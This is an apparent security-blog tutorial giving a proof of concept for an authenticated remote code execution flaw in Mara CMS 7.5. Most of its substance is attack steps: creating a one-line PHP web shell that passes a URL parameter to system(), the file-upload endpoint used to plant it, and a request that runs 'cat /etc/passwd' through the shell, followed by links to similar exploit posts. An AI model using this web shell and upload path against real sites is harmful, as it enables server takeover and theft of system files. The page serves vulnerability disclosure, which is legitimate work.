Tweet
Share
Share
Pin

Hey Folks, In this tutorial we will show you the (POC) of Mara CMS 7.5 Remote Code Execution (Authenticated) Vulnerability.

About the Vulnerability

Exploit Author : Michele Cisternino (0blio_)
Download : https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
Version : 7.5
Tested on: Ubuntu

Vulnerability Setup

https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
unzip -d /var/www/html/MaraCMS75/ MaraCMS75.zip 
cd /var/www/html/MaraCMS75
chmod 777 *
mv example.htaccess .htaccess
cat > webshell.php
'<?php system($_GET["cmd"]); ?>'

Full Proof of Concept

http://localhost/MaraCMS75/codebase/dir.php?type=filenew
http://localhost/MaraCMS75/img/webshell.php?cmd=cat+/etc/passwd
About the Author
Shubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.

Related articles

SiteMagic CMS 4.4.2 Exploit – Arbitrary File Upload (Authenticated)
CVE (POC)

SiteMagic CMS 4.4.2 Exploit – Arbitrary File Upload (Authenticated)

By Shubham Goyal
Daily Tracker System 1.0 Exploit – Authentication Bypass
CVE (POC)

Daily Tracker System 1.0 Exploit – Authentication Bypass

By Shubham Goyal
CMS Made Simple 2.2.14 Exploit – Arbitrary File Upload
CVE (POC)

CMS Made Simple 2.2.14 Exploit – Arbitrary File Upload

By Shubham Goyal
Exploit Gila CMS 1.11.8 – ‘query’ SQL Injection (PoC)
CVE (POC)

Exploit Gila CMS 1.11.8 – ‘query’ SQL Injection (PoC)

By Shubham Goyal
Exploit WordPress Plugin Multi-Scheduler 1.0.0 – CSRF (Delete User) (PoC)
CVE (POC)

Exploit WordPress Plugin Multi-Scheduler 1.0.0 – CSRF (Delete User) (PoC)

By Shubham Goyal

Leave a Reply

Your email address will not be published. Required fields are marked *